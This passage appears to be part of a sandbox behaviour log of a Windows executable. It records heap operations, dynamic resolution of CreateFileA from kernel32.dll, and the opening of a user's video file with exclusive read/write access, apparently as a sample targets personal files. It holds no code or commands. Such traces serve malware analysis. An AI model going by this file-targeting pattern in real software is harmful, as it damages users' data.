hHeap=0x770000) returned 1 [0043.717] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.717] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0043.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0043.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.717] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3e8 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0043.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897d8 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0043.718] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0043.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0043.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0043.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0043.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0043.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0043.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0043.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0043.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0043.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0043.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0043.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0043.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0043.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0043.721] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0043.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0043.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0043.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.723] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0043.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889ad8 [0043.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889ad8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0043.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.723] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0043.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889ad8 [0043.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889ad8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0043.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.724] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0043.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0043.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0043.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4", cchWideChar=75, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 75 [0043.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4b) returned 0x7f36e0 [0043.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4", cchWideChar=75, lpMultiByteStr=0x7f36e0, cbMultiByte=75, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4", lpUsedDefaultChar=0x0) returned 75 [0043.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0043.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.725] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\u373x4nowfcnj.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0043.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0043.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0043.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0043.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=75, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0043.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x96) returned 0x7c5448 [0043.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=75, lpWideCharStr=0x7c5448, cchWideChar=75 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS 